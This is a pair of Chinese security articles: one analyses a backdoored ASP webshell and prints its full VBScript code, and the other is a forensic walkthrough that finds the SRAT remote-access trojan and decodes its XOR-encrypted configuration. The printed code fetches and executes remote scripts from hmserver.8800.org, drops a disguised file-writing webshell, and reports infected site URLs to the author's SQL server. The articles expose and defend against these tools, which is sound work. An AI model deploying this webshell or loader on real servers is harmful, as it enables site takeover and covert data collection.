高级脚本“小马”的后门发现之旅
New4[D.S.T]

 

图2连接SQL服务器

 
图3执行SQL语句

 
图4抓到的数据包

抓包的代码如下：复制内容到剪贴板代码:
amsql="password"
BY01="http"
BY02="hmserver"
BY03="8800"
BY04="org"
BYXG="/"
BYJH="."
BYMH=":"
BYQZ="sql_"
BYHZ="sc.txt"
BYDK="888"
BYURL=BY01&BYMH&BYXG&BYXG&BY02&BYJH&BY03&BYJH&BY04&BYMH&BYDK&BYXG&BYQZ&BYHZ
Set amxml = Server.CreateObject("MSXML2.ServerXMLHTTP")
amxml.open "GET",BYURL,false
amxml.send()
amtxt=amxml.responseText
amtxt=replace(amtxt,"amsc=""password""","amsc="""&password&"""")
execute(amtxt)上面的代码没什么意思，就一个利用XMLHTTP的下载的方法。我们在继续跟找到sql_sc.txt的代码：复制内容到剪贴板代码:
amsc="password"
BYAM="http://hmserver.8800.org:888/hk_"
Function GetUrl()
ScriptAddress=CStr(Request.ServerVariables("SCRIPT_NAME"))
Servername=CStr(Request.ServerVariables("Server_Name"))
findfilename=right(ScriptAddress,len(ScriptAddress)-instrrev(ScriptAddress,"/"))
GetUrl="http://"& Servername & ScriptAddress
Geturl=replace(Geturl,findfilename,"")
End Function
Function GetBody(Url)
Dim objXML
On Error Resume Next
Set objXML=CreateObject("Microsoft.XMLHTTP")
With objXML
.Open "Get", Url, False, "", ""
.Send
GetBody=.ResponseBody
End With
GetBody=BytesToBstr(GetBody,"GB2312")
Set objXML=Nothing
End Function
Function BytesToBstr(strBody,CodeBase)
dim objStream
set objStream=Server.CreateObject("Adodb.Stream")
objStream.Type=1
objStream.Mode=3
objStream.Open
objStream.Write strBody
objStream.Position=0
objStream.Type=2
objStream.Charset=CodeBase
BytesToBstr=objStream.ReadText
objStream.Close
set objStream=nothing
End Function
Function WriteFile(StrContent,Foldername,fileExt,fname)
dim myfos,TheFile,Filename,TheFolder,ThefileExt
Set myfos=Server.CreateObject("Scripting.FileSystemObject")
TheFolder ="./"
ThefileExt=".txt"
If Foldername<>"" Then TheFolder=Foldername
If ThefileExt<>"" Then ThefileExt=fileExt
TheFolder=Server.MapPath(TheFolder)
If myfos.FolderExists(TheFolder)=False Then
myfos.CreateFolder(TheFolder)
End If
If fname="" Then
Filename =Replace(Cstr(time()),":",".")
Else
Filename=fname
End If
TheFile="\\.\"&TheFolder & "\" & Filename & ThefileExt
set fs=Server.CreateObject("Scripting.FileSystemObject")
IF fs.FileExists(TheFile) then
response.write "<script>self.location="""&Geturl&fname&fileext&"?password="&amsc&""";</script>"
Else
Set ff=fs.CreateTextFile(TheFile)
set ff=nothing
response.write "<script>self.location="""&Geturl&fname&fileext&"?password="&amsc&""";</script>"
END IF
set f=fs.GetFile(TheFile)
f.Attributes=0
Set mytxt=myfos.OpenTextFile(TheFile,2,True)
mytxt.Write StrContent
f.Attributes=1+2+4
If err.number<>0 Then
WriteFile=0
End If
mytxt.close
set f=nothing
set fs=nothing
set myfos=nothing
set mytxt=nothing
End Function
aux=GetBody(BYAM&"asp.txt")
aux=replace(aux,"amasp=""password""","amasp="""&amsc&"""")
CALL WriteFile(aux,"",".gif","aux.asp;")
scname=Request.ServerVariables("script_name")
postion=InstrRev(scname,"/")+1
scname=Mid(scname,postion)
If InStr(scname,"?")>0 Then
arrName=scname
arrName=Split(arrName,"?")
scname=arrName(0)
End If
s=Server.MapPath(scname)
Set fso=CreateObject("Scripting.FileSystemObject")
If fso.FileExists(s) Then
fso.Deletefile(s)
End If
Set fso=Nothing这段就是写小马的核心部分了，操作大概意思是在通过XMLHTTP下载将最后的小马代码，保存到服务器上文件名为：aux.asp;.gif（不知道作者为什么要这样取名，如果他是        Win2000系统呢那不是执行不起来？），代码我就简单分析到这里，下面继续跟hk_asp.txt文件由于这代码跟抓包的一样也是XMLHTTP下载“hk_aux.txt”，这里我就直接贴hk_aux.txt的代码了：复制内容到剪贴板代码:
amaux="password"
if request("password")=amaux then
session(amaux)="ok"
else
session(amaux)="no"
end if
if session(amaux)="ok" then
Response.write("<title>ASP无敌上传器</title>")
on error resume next
testfile=Request.form("N")
msg=Request.form("M")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
Response.write("<form method=""POST"" ACTION="""">")
Response.write("<input type=""text"" size=""40"" name=""N"" value="&server.mappath("/")&"\新建文件名.asp>")
Response.write("<input type=""submit"" name=""Send"" value=""无敌上传"" class=input><BR>")
Response.write("<textarea name=M cols=50 rows=7 width=15></textarea>")
Response.write("</form>")

Function GetLocationURL()
Dim Url
Dim ServerPort,ServerName,ScriptName,QueryString
ServerName = Request.ServerVariables("SERVER_NAME")
ServerPort = Request.ServerVariables("SERVER_PORT")
ScriptName = Request.ServerVariables("SCRIPT_NAME")
QueryString = Request.ServerVariables("QUERY_STRING")
Url="http://"&ServerName
If ServerPort <> "80" Then Url = Url & ":" & ServerPort
Url=Url&ScriptName
If QueryString <>"" Then Url=Url&"?"& QueryString
GetLocationURL=Url
End Function
geturl=LCASE(GetLocationURL())
BY01="hmserver"
BY02="8866"
BY03="org"
BYJH="."
CODE="url"
BYLJ1="Driver={SQL Server};"
BYLJ2="server="&BY01&BYJH&BY02&BYJH&BY03&";"
BYLJ3="uid="&CODE&";"
BYLJ4="pwd="&CODE&";"
BYLJ5="database="&CODE&";"
set rs=server.CreateObject("adodb.recordset")
conn=""&BYLJ1&BYLJ2&BYLJ3&BYLJ4&BYLJ5&""
sql="select * from url where url='"&geturl&"'"
rs.open sql,conn,1,3
if rs.bof and rs.eof then
rs.addnew
rs("url")=geturl
rs.update
rs.close
conn.close
set rs=nothing
set conn=nothing
end if

Response.write "请记住完整安全地址,只有完整才能登陆<br>"&geturl
response.end
else
Response.Write "<!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01//EN"" ""http://www.w3.org/TR/html4/strict.dtd"">"
Response.Write "<HTML><HEAD><TITLE>无法找到该页</TITLE>"
Response.Write "<META HTTP-EQUIV=""Content-Type"" Content=""text/html; charset=GB2312"">"
Response.Write "<STYLE type=""text/css""> "
Response.Write "  BODY { font: 9pt/12pt 宋体 }"
Response.Write "  H1 { font: 12pt/15pt 宋体 }"
Response.Write "  H2 { font: 9pt/12pt 宋体 }"
Response.Write "  A:link { color: red }"
Response.Write "  A:visited { color: maroon }"
Response.Write "</STYLE>"
Response.Write "</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>"
Response.Write "<h1>无法找到该页</h1>"
Response.Write "您正在搜索的页面可能已经删除、更名或暂时不可用。"
Response.Write "<hr>"
Response.Write "<p>请尝试以下操作：</p>"
Response.Write "<ul>"
Response.Write "<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>"
Response.Write "<li>如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。"
Response.Write "</li>"
Response.Write "<li>单击<a href=""javascript:history.back(1)"">后退</a>按钮尝试另一个链接。</li>"
Response.Write "</ul>"
Response.Write "<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>"
Response.Write "<hr>"
Response.Write "<p>技术信息（为技术支持人员提供）</p>"
Response.Write "<ul>"
Response.Write "<li>转到 <a href=""http://go.microsoft.com/fwlink/?linkid=1986"">Microsoft 产品支持服务</a>并搜索包括“HTTP”和“404”的标题。</li>"
Response.Write "<li>打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。</li>"
Response.Write "</ul>"
Response.Write "</TD></TR></TABLE></BODY></HTML>"
Response.end
end if以上代码就是他小马的精华部分了，而隐藏的后门也暴露在其中。小马调用方法“aux.asp;.gif?password=123456”，如果密码错误就输出伪造的404错误页面，其实标记200的谁看不出来，骗骗小黑还行。而后门就放在Function GetLocationURL()函数里，其实就是通过SQL将该后门地址“上报”，我们只要用SQL查询分析器查就能把他收集的所有Webshell地址列出来（部分首页被挂马），如图5，如果你耐心将整个流程看完，发现过程也没什么技术含量主要是要有耐心，作者使用了3次XMLHTTP如果你耐心不够，使无法发现其后门所在！

图5 所有收集的后门地址

如果在看他ASP代码发现部分使用变量分段不易读的，可以用如下代码进行组合：

后记：小马也是可以带后门的，请大家以后使用脚本木马要注意查后门，防止被利用导致网站被恶意挂马，那我们就成帮凶了！

注：本文未投任何杂志社，如网络转载、参考内容编稿请注明出处暗组。

PDF文档：201002230951572324.pdf

电子取证远控木马之SRAT

作者:New4[D.S.T] http://www.darkst.com

前言：

    SRAT远程控制软件是在灰鸽子之后出现的又一款功能强大的反弹型木马，具备几乎灰鸽子所有功能并且体积仅有不足200KB，在SRAT发布之后掀起了黑客界换马狂潮。大部分小菜鸟们都觉得灰鸽子免杀难做并且突破主动防御不易，都选择较新或者有更新活力的新远控。而SRAT的条件都满足当前大部分小黑的需要，体积小、易免杀、穿透主动防御能力强。功能强大：文件管理、屏幕监控、超级终端、键盘记录、进程管理、服务管理、窗口管理、插件管理、注册表管理、音频视频监控，等几乎涉及所有计算机操作的功能使小黑们一旦拥有别无所求！使得SRAT近期大量被使用和传播，各类免杀版本发布，一条条新的黑色产业链条应此而生。其强大的键盘记录功能让您的电脑没有任何隐私可言，无论您输入的是中文或者英文以及其他语言都可以完美记录下来！

上面就是SRAT远控木马的简要介绍下面我来向大家展示一个，通过解密木马配置信息来取证的方法。

操作环境：Window Xp Sp3（本地局域网中的虚拟机）

使用工具：Wsyscheck（辅助木马查找）、010Editor（16进制编辑器）

推荐工具：SRAT远控专杀工具 V1.0（可辅助查找并查杀SRAT木马）

首先，我们事先准备了一台虚拟PC(非真实机器)，并且配置一个新的SRAT木马，并运行植入该计算机中已制造一个木马已经潜伏的环境，然后我们就可以继续以下的检查是否被种植了SRAT木马的操作！配置信息如图1和图2。

图1 配置上线地址

图2 配置安装服务端及文件路径

配置完成我们查看一下文件属性，发现木马体积：175KB（如图3），由于SRAT没有压缩服务端的选项所以我们可以锁定，傀儡计算机中如果中了SRAT木马其体积也不会超过200K，如果经过加密或者其他特殊变种后可能会超过体积。而变种不在我们现在讨论的范围内，如果仔细的朋友可能会发现SRAT远控目录下还有个update目录，看字面的意思就是“升级”的意思而你打开目录后会发现有两个文件（如图4）：SratInit.exe和SratMain.dll。大家可以发现这个SratInit.exe的图标和配置出来的那个服务端图标一模一样！没错这个就是安装服务端的主体，也被专业人士称为ServerLoader（即服务端加载程序）。主要作用就是用于木马的安装任务，而SratMain.dll文件就是该木马所有功能的主体了，这个大家看一下体积也就知道了足足有144KB占据了几乎整个木马的大部分体积。一般这类木马的植入计算机后的一些特性如自删除都是由ServerLoader完成的，而安装完成之后ServerLoader就不在使用了！以减少被杀毒软件查杀的几率因为它已经没有了安装的特性，也就是说一个杀人犯他没有带凶器。就算警察（杀毒软件）查到也不一定能给他定罪，然而谁能又知道这看似正常的一个文件既然是一个能完成潜伏并后台操作的木马？这类的木马我们一般都称为：DLL型木马它的传播必须有一个ServerLoader程序（EXE），我们在查杀SRAT木马（DLL型木马）的时候我们只能找它的DLL文件进行查杀而不是找EXE。因为一般EXE都不存在了，所以我们下文所说的内容主要都是以讲解其DLL文件为主，请大家留意不要弄错了！

图3 配置出来SRAT服务端大小

图4 update目录下的文件

查找木马

我们已经运行了SRAT服务端程序，并且确认SRAT已经正常工作了。如图5，机器已经可以被牧马者操控了！下面请出我们的Wsyscheck，运行后如图6，现在我们操作选项卡切换到安全检查 ，并且点到端口状态我们能看到有一个程序连接到我们控制端默认端口：8800上，如图7，我们这时候记下他的进程PID是3032。好我们切换到进程管理功能中查找进程PID是3032的进程发现是一个svchost.exe进程，可能这时候有人要问为什么这么肯定是这个？这个不是系统进程？我能肯定的说这个是系统进程但它不是正常的系统进程，这时候我们点到这个进程查看模块路径列表空空如也（如图8），这是为什么？原因是SRAT木马他伪装了微软文件版权，而Wsyscheck默认设置是将这部分忽略不显示的。我们只要将软件设置中的 模块、服务简洁显示前面的勾（如图9）去掉你就能看到被忽略的所有模块了如图10，我们可以发现有一个模块非常奇怪“c:\program files\common files\microsoft shared\msinfo\nmt6psdo.dll”其文件名是一些随机字符，并不是一些正常的系统文件命名。通过网上搜索引擎都无法查询到！我们可以确定这个就是可疑文件（这个我们配置的时候路径选择了msinfo目录所以我能一下判断出来），我们找到该文件如图11，我们发现和文件版权信息有微软字样并且和我们之前看的“update目录”下的那个dll文件一样！有人可能说这样找样本是不是太费力了啊？这个没问题我们给大家准备了更简单的方法。运行SRAT远控专杀工具 V1.0点扫描木马按钮，如图12，我们的检测工具能在2秒内查到SRAT木马，并且路径和文件名和我们用Wsyscheck查找的一模一样。这样大家是不是觉得简单很多了？没问题我们进入下一步如何获取服务端里的加密信息（取证）！

图5 列出机器上C盘根目录的所有文件

图6 Wsyscheck运行后的截图

图7 发现一条可疑网络连接

图8 模块列表里未显示任何模块

图9 去掉模块、服务简洁显示前面的勾

图10 可以正常显示模块了

图11 木马文件

图12 提示发现SRAT木马

取证木马

我们从机器上取回了SRAT木马样本，下面如何获得里面的配置的域名信息？下面我们就请出主角010Editor编辑软件，我们用010Editor打开取回的样本文件：rsPtXa1x.dll。如图13，我们将光标移动到文件尾部如图14。你可以看到很多1F 1F的数据，现在我们记下这个1F。（为什么要记得1F这个？这个就是配置信息解密的Key密钥），我们向上选择带1F的数据，大小约352字节（可能和实际操作时不同），如图15，我们现在点选工具菜单>操作>二进制异或，如图16。下面我们设置，数据类型为：无符号字节，操作数：1F，16进制操作，如图17，设置解密参数完毕后点确定。这个时候我们在看那一串字符已经被解密了！如图18，我们可以清晰的看到我们刚刚配置的域名：127.0.0.1端口：8800，服务名：SRAT_Service，下面的就是通过域名信息追踪IP了，我就不多介绍了。Ping一下就可以完成IP定位了，到这里我们所有取证过程就完了。

图13 用010Editor打开SRAT木马样本

图14 文件尾部的数据

图15 选定352字节大小 左右的数据

图16 二进制异或操作

图 17 解密参数设置

图18 解密后的明文

后记：

到这里我们已经将一个SRAT远控木马的如何查找的过程和取证过程介绍完毕了，希望大家看完后能举一反三。多多实践找出更多的方法，最后想说一句的是新的刑法已经公布了，还在玩远控的各位黑友们一定要注意了！

时间：2009/3/14

 原始DOC稿件：201002211348152873.rar